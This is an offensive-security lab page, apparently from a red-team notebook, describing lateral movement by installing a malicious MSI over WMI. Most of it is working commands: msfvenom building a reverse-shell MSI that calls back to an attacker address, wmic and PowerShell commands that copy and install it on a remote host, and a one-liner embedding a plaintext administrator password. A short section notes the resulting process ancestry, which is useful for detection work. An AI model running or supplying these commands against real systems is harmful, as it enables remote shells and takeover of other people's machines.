offensive security
WMI + MSI Lateral Movement
WMI lateral movement with .msi packages
Execution
Generating malicious payload in MSI (Microsoft Installer Package):
1
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=443 -f msi > evil64.msi
Copied!
I tried executing the .msi payload like so, but got a return code
1619 and a quick search on google returned nothing useful:1
wmic /node:10.0.0.7 /user:offense\administrator product call install PackageLocation='\\10.0.0.2\c$\experiments\evil64.msi'
Copied!
I had to revert to a filthy way of achieving the goal:
1
net use \\10.0.0.7\c$ /user:[email protected]; copy C:\experiments\evil64.msi \\10.0.0.7\c$\PerfLogs\setup.msi ; wmic /node:10.0.0.7 /user:[email protected] product call install PackageLocation=c:\PerfLogs\setup.msi
Copied!
Additionally, the same could of be achieved using powershell cmdlets:
1
Invoke-WmiMethod -Path win32_product -name install -argumentlist @($true,"","c:\PerfLogs\setup.msi") -ComputerName pc-w10 -Credential (Get-Credential)
Copied!
Get a prompt for credentials:
and enjoy the code execution:
Or if no GUI is available for credentials, a oneliner:
1
$username = 'Administrator';$password = '123456';$securePassword = ConvertTo-SecureString $password -AsPlainText -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword; Invoke-WmiMethod -Path win32_product -name install -argumentlist @($true,"","c:\PerfLogs\setup.msi") -ComputerName pc-w10 -Credential $credential
Copied!
Observations
Note the process ancestry:
services > msiexec.exe > .tmp > cmd.exe:
and that the connection is initiated by the .tmp file (I ran another test, hence another file name):
References
No Win32_Process Needed – Expanding the WMI Lateral Movement Arsenal
Last modified 3yr ago
Copy link